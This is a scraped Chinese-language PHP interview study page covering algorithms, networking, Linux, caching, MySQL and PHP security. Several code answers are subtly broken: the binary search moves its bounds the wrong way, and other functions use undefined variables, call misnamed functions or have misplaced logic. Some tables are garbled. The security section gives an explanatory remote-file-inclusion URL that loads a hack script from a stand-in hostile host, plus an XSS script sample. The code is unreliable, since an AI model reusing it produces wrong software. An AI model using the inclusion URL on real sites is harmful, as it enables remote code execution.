Home > Backend Development > PHP Tutorial > Interview summary of 3 years PHP programmer

Interview summary of 3 years PHP programmer

不言
Release: 2023-03-24 15:28:01
Original
3418 people have browsed it

这篇文章介绍的内容是关于3年PHP程序员的面试总结,有着一定的参考价值,现在分享给大家,有需要的朋友可以参考一下

1.反转函数的实现#

/**
 * 反转数组
 * @param  array $arr 
 * @return array
 */function reverse($arr){
    $n = count($arr);

    $left = 0;
    $right = $n - 1;

    while ($left < $right) {
        $temp = $arr[$left];
        $arr[$left++] = $arr[$right];
        $arr[$right--] = $temp;
    }

    return $arr;}
Copy after login

2.两个有序int集合是否有相同元素的最优算法#

/**
 * 寻找两个有序数组里相同的元素
 * @param  array $arr1 
 * @param  array $arr2 
 * @return array      
 */function find_common($arr1, $arr2){
    $common = array();
    $i = $j = 0;
    $count1 = count($arr1);
    $count2 = count($arr2);
    while ($i < $count1 && $j < $count2) {
        if ($arr1[$i] < $arr2[$j]) {
            $i++;
        } elseif ($arr1[$i] > $arr2[$j]) {
            $j++;
        } else {
            $common[] = $arr[$i];
            $i++;
            $j++;
        }
    }
    return array_unique($common);}
Copy after login

3.将一个数组中的元素随机(打乱)#

/**
 * 打乱数组
 * @param  array $arr 
 * @return array      
 */function custom_shuffle($arr){
    $n = count($arr);
    for ($i = 0; $i < $n; $i++) {
        $rand_pos = mt_rand(0, $n - 1);
        if ($rand_pos != $i) {
            $temp = $arr[$i];
            $arr[$i] = $arr[$rand_pos];
            $arr[$rand_pos] = $temp;
        }
    }
    return $arr;}
Copy after login

4.给一个有数字和字母的字符串,让连着的数字和字母对应#

function number_alphabet($str){
    $number = preg_split(&#39;/[a-z]+/&#39;, $str, -1, PREG_SPLIT_NO_EMPTY);
    $alphabet = preg_split(&#39;/\d+/&#39;, $str, -1, PREG_SPLIT_NO_EMPTY);
    $n = count($number);
    for ($i = 0; $i < $count; $i++) { 
        echo $number[$i] . &#39;:&#39; . $alphabet[$i] . &#39;</br>&#39;;
    }}$str = &#39;1a3bb44a2ac&#39;;number_alphabet($str);//1:a 3:bb 44:a 2:ac
Copy after login

5.求n以内的质数(质数的定义:在大于1的自然数中,除了1和它本身意外,无法被其他自然数整除的数)#


思路:1.(质数筛选定理)n不能够被不大于根号n的任何质数整除,则n是一个质数
2.除了2的偶数都不是质数
代码如下:

/**
 * 求n内的质数
 * @param int $n 
 * @return array
 */function get_prime($n){
    $prime = array(2);//2为质数

    for ($i = 3; $i <= $n; $i += 2) {//偶数不是质数,步长可以加大 
        $sqrt = intval(sqrt($i));//求根号n

        for ($j = 3; $j <= $sqrt; $j += 2) {//i是奇数,当然不能被偶数整除,步长也可以加大。 
            if ($i % $j == 0) {
                break;
            }
        }

        if ($j > $sqrt) {
            array_push($prime, $i);
        }
    }

    return $prime;}print_r(getPrime(1000));
Copy after login

6.约瑟夫环问题#

相关题目:一群猴子排成一圈,按1,2,…,n依次编号。然后从第1只开始数,数到第m只,把它踢出圈,从它后面再开始数, 再数到第m只,在把它踢出去…,如此不停的进行下去, 直到最后只剩下一只猴子为止,那只猴子就叫做大王。要求编程模拟此过程,输入m、n, 输出最后那个大王的编号。

/**
 * 获取大王
 * @param  int $n 
 * @param  int $m 
 * @return int  
 */function get_king_mokey($n, $m) {
    $arr = range(1, $n);

    $i = 0;

    while (count($arr) > 1) {
        $i++;
        $survice = array_shift($arr);

        if ($i % $m != 0) {
            array_push($arr, $survice);
        }
    }

    return $arr[0];}
Copy after login

7.如何快速寻找一个数组里最小的1000个数#

思路:假设最前面的1000个数为最小的,算出这1000个数中最大的数,然后和第1001个数比较,如果这最大的数比这第1001个数小的话跳过,如果要比这第1001个数大则将两个数交换位置,并算出新的1000个数里面的最大数,再和下一个数比较,以此类推。
代码如下:

//寻找最小的k个数//题目描述//输入n个整数,输出其中最小的k个。/**
 * 获取最小的k个数
 * @param  array $arr 
 * @param  int $k   [description]
 * @return array
 */function get_min_array($arr, $k){
    $n = count($arr);

    $min_array = array();

    for ($i = 0; $i < $n; $i++) {
        if ($i < $k) {
            $min_array[$i] = $arr[$i];
        } else {
            if ($i == $k) {
                $max_pos = get_max_pos($min_array);
                $max = $min_array[$max_pos];
            }

            if ($arr[$i] < $max) {
                $min_array[$max_pos] = $arr[$i];

                $max_pos = get_max_pos($min_array);
                $max = $min_array[$max_pos];
            }
        }
    }

    return $min_array;}/**
 * 获取最大的位置
 * @param  array $arr 
 * @return array
 */function get_max_pos($arr){
    $pos = 0;
    for ($i = 1; $i < count($arr); $i++) { 
        if ($arr[$i] > $arr[$pos]) {
            $pos = $i;
        }
    }

    return $pos;}$array = [1, 100, 20, 22, 33, 44, 55, 66, 23, 79, 18, 20, 11, 9, 129, 399, 145, 2469, 58];$min_array = get_min_array($array, 10);print_r($min_array);
Copy after login

8.如何在有序的数组中找到一个数的位置(二分查找)#

代码如下:

/**
 * 二分查找
 * @param  array $array 数组
 * @param  int $n 数组数量
 * @param  int $value 要寻找的值
 * @return int
 */function binary_search($array, $n, $value){
    $left = 0;
    $right = $n - 1;

    while ($left <= $right) {
        $mid = intval(($left + $right) / 2);
        if ($value > $array[$mid]) {
            $right = $mid + 1;
        } elseif ($value < $array[$mid]) {
            $left = $mid - 1;
        } else {
            return $mid;
        }
    }

    return -1;}
Copy after login

9.给定一个有序整数序列,找出绝对值最小的元素#

思路:二分查找

/**
 * 获取绝对值最小的元素
 * @param  array $arr
 * @return int  
 */function get_min_abs_value($arr){
    //如果符号相同,直接返回
    if (is_same_sign($arr[0], $arr[$n - 1])) {
        return $arr[0] >= 0 ? $arr[0] : $arr[$n - 1];
    }

    //二分查找
    $n = count($arr);
    $left = 0;
    $right = $n - 1;

    while ($left <= $right) {
        if ($left + 1 === $right) {
            return abs($arr[$left]) < abs($arr[$right]) ? $arr[$left] : $arr[$right];
        }

        $mid = intval(($left + $right) / 2);

        if ($arr[$mid] < 0) {
            $left = $mid + 1;
        } else {
            $right = $mid - 1;
        }
    }}/**
 * 判断符号是否相同
 * @param  int  $a 
 * @param  int  $b 
 * @return boolean  
 */function is_same_sign($a, $b){
    if ($a * $b > 0) {
        return true;
    } else {
        return false;
    }}
Copy after login

10.找出有序数组中随机3个数和为0的所有情况#

思路:动态规划

function three_sum($arr){
    $n = count($arr);

    $return = array();

    for ($i=0; $i < $n; $i++) { 
        $left = $i + 1;
        $right = $n - 1;

        while ($left <= $right) {
            $sum = $arr[$i] + $arr[$left] + $arr[$right];

            if ($sum < 0) {
                $left++;
            } elseif ($sum > 0) {
                $right--;
            } else {
                $numbers = $arr[$i] . &#39;,&#39; . $arr[$left] . &#39;,&#39; . $arr[$right];
                if (!in_array($numbers, $return)) {
                    $return[] = $numbers;
                }

                $left++;
                $right--;
            }
        }
    }

    return $return;}$arr = [-10, -9, -8, -4, -2, 0, 1, 2, 3, 4, 5, 6, 9];var_dump(three_sum($arr));
Copy after login

11.编写一个PHP函数,求任意n个正负整数里面最大的连续和,要求算法时间复杂度尽可能低。#

思路:动态规划

/**
 * 获取最大的连续和
 * @param  array $arr 
 * @return int 
 */function max_sum_array($arr){
    $currSum = 0;
    $maxSum = 0;//数组元素全为负的情况,返回最大数

    $n = count($arr);

    for ($i = 0; $i < $n; $i++) { 
        if ($currSum >= 0) {
            $currSum += $arr[$i];
        } else {
            $currSum = $arr[$i];
        }
    }

    if ($currSum > $maxSum) {
        $maxSum = $currSum;
    }

    return $maxSum;}
Copy after login

计算机网络#

1.HTTP中GET与POST的区别,注意最后一条#

  1. GET在浏览器回退时是无害的,而POST会再次提交请求。

  2. GET产生的URL地址可以被Bookmark,而POST不可以。

  3. GET请求会被浏览器主动cache,而POST不会,除非手动设置。

  4. GET请求只能进行url编码,而POST支持多种编码方式。

  5. GET请求参数会被完整保留在浏览器历史记录里,而POST中的参数不会被保留。

  6. GET请求在URL中传送的参数是有长度限制的,而POST没有。

  7. 对参数的数据类型,GET只接受ASCII字符,而POST没有限制。

  8. GET比POST更不安全,因为参数直接暴露在URL上,所以不能用来传递敏感信息。

  9. GET参数通过URL传递,POST放在Request body中。

  10. GET产生一个TCP数据包,POST产生两个TCP数据包。

2.为什么Tcp连接是三次,挥手是四次#

在Tcp连接中,服务端的SYN和ACK向客户端发送是一次性发送的,而在断开连接的过程中,B端向A端发送的ACK和FIN是分两次发送的。因为在B端接收到A端的FIN后,B端可能还有数据要传输,所以先发送ACK,等B端处理完自己的事情后就可以发送FIN断开连接了。

3.Cookie存在哪#

  1. 如果设置了过期时间,Cookie存在硬盘里

  2. 没有设置过期时间,Cookie存在内存里

4.COOKIE和SESSION的区别和关系#

  1. COOKIE保存在客户端,而SESSION则保存在服务器端

  2. 从安全性来讲,SESSION的安全性更高

  3. 从保存内容的类型的角度来讲,COOKIE只保存字符串(及能够自动转换成字符串)

  4. 从保存内容的大小来看,COOKIE保存的内容是有限的,比较小,而SESSION基本上没有这个限制

  5. 从性能的角度来讲,用SESSION的话,对服务器的压力会更大一些

  6. SEEION依赖于COOKIE,但如果禁用COOKIE,也可以通过url传递

Linux#

1.如何修改文件为当前用户只读#

chmod u=r 文件名

2.Linux进程属性#

  1. 进程:是用pid表示,它的数值是唯一的

  2. 父进程:用ppid表示

  3. 启动进程的用户:用UID表示

  4. 启动进程的用户所属的组:用GID表示

  5. 进程的状态:运行R,就绪W,休眠S,僵尸Z

3.统计某一天网站的访问量#

awk &#39;{print $1}&#39; /var/log/access.log | sort | uniq | wc -l
Copy after login

推荐篇文章,讲awk实际使用的shell在手分析服务器日志不愁

Nginx

#1.The difference between fastcgi listening through port and listening through file

#Listening methodFormnginx link fastcgi method
Port monitoringfastcgi_pass 127.0.0.1:9000TCP link
File monitoringfastcgi_pass /tmp/php_cgi.sockUnix domain Socket

2 .nginx load balancing implementation

  1. #Polling

  2. User IP hash

  3. Specify weight

  4. fair (third party)

  5. url_hash (third party)

Memcache/ Redis

#1. How does Redis master and slave synchronize data? (i.e. replication function)

#Whether it is the initial connection or reconnection, when a slave server is established, the slave server will send a SYNC command from the master server. The main server that receives the SYNC command will start executing BGSAVE, and during the save operation, save all newly executed commands into a buffer. When BGSAVE is completed, the main server will execute the .rdb obtained by the save operation. The file is sent to the slave server, which receives the .rdb file from the server and loads the data in the file into memory. Afterwards, the master server will send all the contents accumulated in the write command buffer to the slave server in the format of the Redis command protocol.

2.Memcache cache hit rate

#Cache hit rate = get_hits/cmd_get * 100%

3.Memcache cluster implementation

#Consistent Hash

4. The difference between Memcache and Redis

  1. #Memcache

  • ##The product itself is especially Data is stored in memory. If the server suddenly loses power, all data will be lost

  • The data stored in a single key (variable) has a limit of 1M

  • The types of stored data are all String string types

  • It has no persistence function

  • Can use multi-core (multi-threading) )

Redis

  • The data types are relatively rich: String, List, Set, Sortedset, Hash

  • Has persistence function, data can be stored on disk at any time

  • It has certain calculation function

  • Single key (variable) The stored data is limited to 1GB

MySQL

#1. When executing the SQL statement: select count(*) from articles, which one is faster, MyISAM or InnoDB

#MyISAM is fast because MyISAM itself records the quantity, while InnoDB has to scan the data

3. Implicit conversion

  • #When the query field is of type INT , if the query condition is CHAR, convert the query condition to INT. If the string is preceded by numbers, it will be intercepted. If not, it will be converted to 0.

  • When the query field is of CHAR/VARCHAR type and the query condition is INT, changing the query field to INT and then comparing it may cause a full table scan

2. The leftmost prefix principle

#There is a compound index:

INDEX(`a`, `b`, `c`)

How to useCan I use index##select * from users where a = 1 and b = 2select * from users where b = 2 and a = 1select * from users where a = 2 and c = 1select * from users where b = 2 and c = 1

3.聚簇索引和非聚簇索引的区别#

聚簇索引的叶节点就是数据节点,而非聚簇索引的页节点仍然是索引检点,并保留一个链接指向对应数据块。

PHP#

1.Session可不可以设置失效时间,比如30分钟过期#

  1. 设置seesion.cookie_lifetime有30分钟,并设置session.gc_maxlifetime为30分钟

  2. 自己为每一个Session值增加timestamp

  3. 每次访问之前, 判断时间戳

2.PHP进程间通信的几种方式#

  • 消息队列

  • 信号量+共享内存

  • 信号

  • 管道

  • socket

3.php类的静态调用和实例化调用各自的利弊#

静态方法是类中的一个成员方法,属于整个类,即使不用创建任何对象也可以直接调用!静态方法效率上要比实例化高,静态方法的缺点是不自动销毁,而实例化的则可以做销毁。

4.类的数组方式调用#

ArrayAccess(数组式访问)接口

5.用php写一个函数,获取一个文本文件最后n行内容,要求尽可能效率高,并可以跨平台使用。#

function tail($file, $num){  
    $fp = fopen($file,"r");  
    $pos = -2;
    $eof = "";  
    $head = false;   //当总行数小于Num时,判断是否到第一行了  
    $lines = array();  
    while ($num > 0) {  
        while($eof != PHP_EOL){  
            if (fseek($fp, $pos, SEEK_END) == 0) {    //fseek成功返回0,失败返回-1  
                $eof = fgetc($fp);
                $pos--;  
            } else {                            //当到达第一行,行首时,设置$pos失败  
                fseek($fp, 0, SEEK_SET);
                $head = true;                   //到达文件头部,开关打开  
                break;  
            }  
        }  
        array_unshift($lines, str_replace(PHP_EOL, &#39;&#39;, fgets($fp)));   
        if ($head) {//这一句,只能放上一句后,因为到文件头后,把第一行读取出来再跳出整个循环  
            break; 
        }                 
        $eof = "";  
        $num--;  
    }  
    fclose($fp);  
    return $lines;  }
Copy after login

6.$SERVER['SERVER_NAME']和$SERVER['HTTP_HOST']的区别#

相同点:当满足以下三个条件时,两者会输出相同信息。

  1. 服务器为80端口

  2. apache的conf中ServerName设置正确

  3. HTTP/1.1协议规范

不同点:

  1. 通常情况:$_SERVER["HTTP_HOST"] 在HTTP/1.1协议规范下,会根据客户端的HTTP请求输出信息。$_SERVER["SERVER_NAME"] 默认情况下直接输出apache的配置文件httpd.conf中的ServerName值。

  2. 当服务器为非80端口时:$_SERVER["HTTP_HOST"] 会输出端口号,例如:coffeephp.com:8080$_SERVER["SERVER_NAME"] 会直接输出ServerName值因此在这种情况下,可以理解为:$_SERVER['HTTP_HOST'] = $_SERVER['SERVER_NAME'] : $_SERVER['SERVER_PORT']

  3. 当配置文件httpd.conf中的ServerName与HTTP/1.0请求的域名不一致时:httpd.conf配置如下:

    <virtualhost *>    
    ServerName jsyzchen.com    
    ServerAlias blog.jsyzchen.com    
    </virtualhost>
    Copy after login

    客户端访问域名 blog.jsyzchen.com$_SERVER["HTTP_HOST"] 输出 blog.jsyzchen.com$_SERVER["SERVER_NAME"] 输出jsyzchen.com

7.打开php.ini的safe_mode会影响哪些参数#

当safe_mode=On时,会出现下面限制:

  1. 所有输入输出函数(例如fopen()、file()和require())的适用会受到限制,只能用于与调用这些函数的脚本有相同拥有者的文件。例如,假定启用了安全模式,如果Mary拥有的脚本调用fopen(),尝试打开由Jonhn拥有的一个文件,则将失败。但是,如果Mary不仅拥有调用 fopen()的脚本,还拥有fopen()所调用的文件,就会成功。

  2. 如果试图通过函数popen()、system()或exec()等执行脚本,只有当脚本位于safe_mode_exec_dir配置指令指定的目录才可能。

  3. HTTP验证得到进一步加强,因为验证脚本用于者的UID划入验证领域范围内。此外,当启用安全模式时,不会设置PHP_AUTH。

  4. 如果适用MySQL数据库服务器,链接MySQL服务器所用的用户名必须与调用mysql_connect()的文件拥有者用户名相同。
    详细的解释可以查看官网:http://www.php.net/manual/zh/ini.sect.safe-mode.phpphp safe_mode影响参数

can use a and b
can use a and b( With MySQL query optimizer)
can be used a
cannot
##dbmopen() Check whether the file or directory being operated on has the same UID (owner) as the script being executed. dbase_open() Checks whether the file or directory being operated on has the same UID (owner) as the script being executed. filepro() Checks whether the file or directory being manipulated has the same UID (owner) as the script being executed. filepro_rowcount() Checks whether the file or directory being manipulated has the same UID (owner) as the script being executed. filepro_retrieve() Checks whether the file or directory being manipulated has the same UID (owner) as the script being executed. ifx_* sql_safe_modeLimit, (!= safe mode)ingres_* sql_safe_mode Limit, (!= safe mode)mysql_* sql_safe_modeLimit, (!= safe mode)pg_loimport ()Check whether the file or directory being operated on has the same UID (owner) as the script being executed. posix_mkfifo() Checks whether the directory being manipulated has the same UID (owner) as the script being executed. putenv()Follow the safe_mode_protected_env_vars and safe_mode_allowed_env_vars options set by ini. Please refer to the documentation for the putenv() function. move_uploaded_file() Checks whether the file or directory being manipulated has the same UID (owner) as the script being executed. chdir() Checks whether the directory being manipulated has the same UID (owner) as the script being executed. dl()This function is disabled in safe mode. backtick operatorThis function is disabled in safe mode. shell_exec() (functionally the same as the backticks function) This function is disabled in safe mode. exec()Can only be executed in the directory set by safe_mode_exec_dir. For some reason, .. cannot currently be used in the path of an executable object. escapeshellcmd() will be applied to the arguments of this function. system()Can only be executed in the directory set by safe_mode_exec_dir. For some reason, .. cannot currently be used in the path of an executable object. escapeshellcmd() will be applied to the arguments of this function. passthru()The operation can only be performed in the directory set by safe_mode_exec_dir. For some reason, .. cannot currently be used in the path of an executable object. escapeshellcmd() will be applied to the arguments of this function. popen()The operation can only be performed in the directory set by safe_mode_exec_dir. For some reason, .. cannot currently be used in the path of an executable object. escapeshellcmd() will be applied to the arguments of this function. fopen() Checks whether the directory being operated on has the same UID (owner) as the script being executed. mkdir() Checks whether the directory being manipulated has the same UID (owner) as the script being executed. rmdir() Checks whether the directory being manipulated has the same UID (owner) as the script being executed. rename() Checks whether the file or directory being manipulated has the same UID (owner) as the script being executed. Check if the directory being manipulated has the same UID (owner) as the script being executed. unlink() Checks whether the file or directory being operated on has the same UID (owner) as the script being executed. Check if the directory being manipulated has the same UID (owner) as the script being executed. copy() Checks whether the file or directory being manipulated has the same UID (owner) as the script being executed. Check if the directory being manipulated has the same UID (owner) as the script being executed. (on source and target )chgrp()Checks whether the file or directory being operated on has the same UID (owner) as the script being executed. chown() Checks whether the file or directory being manipulated has the same UID (owner) as the script being executed.
Function nameRestrictions
chmod()Checks whether the file or directory being manipulated has the same UID (owner) as the script being executed. In addition, SUID, SGID and sticky bits cannot be set
touch()Check whether the file or directory being operated on has the same UID as the script being executed (all By). Check if the directory being manipulated has the same UID (owner) as the script being executed.
symlink() Checks whether the file or directory being manipulated has the same UID (owner) as the script being executed. Check if the directory being manipulated has the same UID (owner) as the script being executed. (Note: Test target only)
#link()Checks whether the file or directory being operated on has the same UID (owner) as the script being executed. Check if the directory being manipulated has the same UID (owner) as the script being executed. (Note: Test target only)
apache_request_headers()In safe mode, headers starting with "authorization" (case-sensitive) will not be return.
header()In safe mode, if WWW-Authenticate is set, the uid of the current script will be added to the realm portion of this header.
PHP_AUTH variable In safe mode, the variables PHP_AUTH_USER, PHP_AUTH_PW, and PHP_AUTH_TYPE are not available in $_SERVER. But anyway, you can still use REMOTE_USER to get the user name (USER). (Note: Only valid after PHP 4.3.0)
highlight_file(), show_source() Check whether the file or directory being operated is consistent with the script being executed Same UID (owner). Check if the directory being manipulated has the same UID (owner) as the script being executed. (Note, only valid after version 4.2.1)
parse_ini_file()Check whether the file or directory being operated on has the same UID as the script being executed (owner). Check if the directory being manipulated has the same UID (owner) as the script being executed. (Note, only valid after version 4.2.1)
set_time_limit()Does not work in safe mode.
max_execution_timeDoes not work in safe mode.
mail()In safe mode, the fifth parameter is blocked.

8.PHP解决多进程同时写一个文件的问题#

function write($str){
    $fp = fopen($file, &#39;a&#39;);
    do {
        usleep(100);
    } while (!flock($fp, LOCK_EX));
    fwrite($fp, $str . PHP_EOL);
    flock($fp, LOCK_UN);
    fclose($fp);}
Copy after login

9.PHP里的超全局变量#

  • $GLOBALS

  • $_SERVER

  • $_GET

  • $_POST

  • $_FILES

  • $_COOKIE

  • $_SESSION

  • $_REQUEST

  • $_ENV

10.php7新特性#

  • ?? 运算符(NULL 合并运算符)

  • 函数返回值类型声明

  • 标量类型声明

  • use 批量声明

  • define 可以定义常量数组

  • 闭包( Closure)增加了一个 call 方法详细的可以见官网:php7-new-features

11.php7卓越性能背后的优化#

  • 减少内存分配次数

  • 多使用栈内存

  • 缓存数组的hash值

  • 字符串解析成桉树改为宏展开

  • 使用大块连续内存代替小块破碎内存详细的可以参考鸟哥的PPT:PHP7性能之源

12.include($_GET['p'])的安全隐患#

现在任一个黑客现在都可以用:http://www.yourdomain.com/index.php?p=anyfile.txt 来获取你的机密信息,或执行一个PHP脚本。如果allow_url_fopen=On,你更是死定了:试试这个输入:http://www.yourdomain.com/index.php?p=http://youaredoomed.com/phphack.php现在你的网页中包含了http://www.youaredoomed.com/phphack.php的输出. 黑客可以发送垃圾邮件,改变密码,删除文件等等。只要你能想得到。

13.列出一些防范SQL注入、XSS攻击、CSRF攻击的方法#

SQL注入:

  • addslashes函数

  • mysql_real_escape_string/mysqli_real_escape_string/PDO::quote()

  • PDO预处理XSS:htmlspecial函数CSRF:

  • 验证HTTP REFER

  • 使用toke进行验证

14.接口如何安全访问#

jwt或验证签名

15.PHP里有哪些设计模式#

  • 单例模式

  • 工厂模式

  • 脸面模式(facade)

  • 注册器模式

  • 策略模式

  • 原型模式

  • 装饰器模式更多的可以看PHP设计模式简介这篇文章

16.验证ip是否正确#

function check_ip($ip){
    if (!filter_var($ip, FILTER_VALIDATE_IP)) {
    return false;
    } else {
        return true;
    }}
Copy after login

17.验证日期是否合理#

function check_datetime($datetime){
    if (date(&#39;Y-m-d H:i:s&#39;, strtotime($datetime)) === $datetime) {
        return true;
    } else {
        return false;
    }}
Copy after login

18.写一个正则表达式,过滤JS脚本(及把script标记及其内容都去掉)#

<p style="margin-bottom: 7px;">$text = &#39;<script>alert(&#39;XSS&#39;)</script>&#39;;$pattern = &#39;<script.*>.*<\/script>/i&#39;;$text = preg_replace($pattern, &#39;&#39;, $text);<br/></p>
Copy after login

19.下单后30分钟未支付取消订单#

第一种方案:被动过期+cron,就是用户查看的时候去数据库查有没有支付+定时清理。第二种方案:延迟性任务,到时间检查订单是否支付成功,如果没有支付则取消订单

20.设计一个秒杀系统#

思路:用redis的队列

$ttl = 4;$random = mt_rand(1,1000).&#39;-&#39;.gettimeofday(true).&#39;-&#39;.mt_rand(1,1000);$lock = fasle;while (!$lock) {
    $lock = $redis->set(&#39;lock&#39;, $random, array(&#39;nx&#39;, &#39;ex&#39; => $ttl));}if ($redis->get(&#39;goods.num&#39;) <= 0) {
    echo ("秒杀已经结束");
    //删除锁
    if ($redis->get(&#39;lock&#39;) == $random) {
        $redis->del(&#39;lock&#39;);
    }
    return false;}$redis->decr(&#39;goods.num&#39;);echo ("秒杀成功");//删除锁if ($redis->get(&#39;lock&#39;) == $random) {
    $redis->del(&#39;lock&#39;);}return true;
Copy after login

21.请设计一个实现方式,可以给某个ip找到对应的省和市,要求效率竟可能的高#

//ip2long,把所有城市的最小和最大Ip录进去$redis_key = &#39;ip&#39;;$redis->zAdd($redis_key, 20, &#39;#bj&#39;);//北京的最小IP加#$resid->zAdd($redis_key, 30, &#39;bj&#39;);//最大IPfunction get_ip_city($ip_address){
    $ip = ip2long($ip_address);

    $redis_key = &#39;ip&#39;;
    $city = zRangeByScore($redis_key, $ip, &#39;+inf&#39;, array(&#39;limit&#39; => array(0, 1)));
    if ($city) {
        if (strpos($city[0], "#") === 0) {
            echo &#39;城市不存在!&#39;;
        } else {
            echo &#39;城市是&#39; . $city[0];
        }
    } else {
        echo &#39;城市不存在!&#39;;
    }}
Copy after login

其他#

1.网页/应用访问慢突然变慢,如何定位问题#

  1. top、iostat查看cpu、内存及io占用情况

  2. 内核、程序参数设置不合理查看有没有报内核错误,连接数用户打开文件数这些有没有达到上限等等

  3. 链路本身慢是否跨运营商、用户上下行带宽不够、dns解析慢、服务器内网广播风暴什么的

  4. 程序设计不合理是否程序本身算法设计太差,数据库语句太过复杂或者刚上线了什么功能引起的

  5. 其它关联的程序引起的如果要访问数据库,检查一下是否数据库访问慢

  6. 是否被攻击了查看服务器是否被DDos了等等

  7. 硬件故障这个一般直接服务器就挂了,而不是访问慢

2.如何设计/优化一个访问量比较大的博客/论坛#

  • 减少http请求(比如使用雪碧图)

  • 优化数据库(范式、SQL语句、索引、配置、读写分离)

  • 缓存使用(Memcache、Redis)

  • 负载均衡

  • 动态内容静态化+CDN

  • 禁止外部盗链(refer、图片添加水印)

  • 控制大文件下载

  • 使用集群

3.如何搭建Composer私有库#

使用satis搭建
相关文章介绍:使用satis搭建Composer私有库

相关推荐:

面试题解答

The above is the detailed content of Interview summary of 3 years PHP programmer. For more information, please follow other related articles on the PHP Chinese website!

Related labels:
source:php.cn
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Popular Tutorials
More>
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template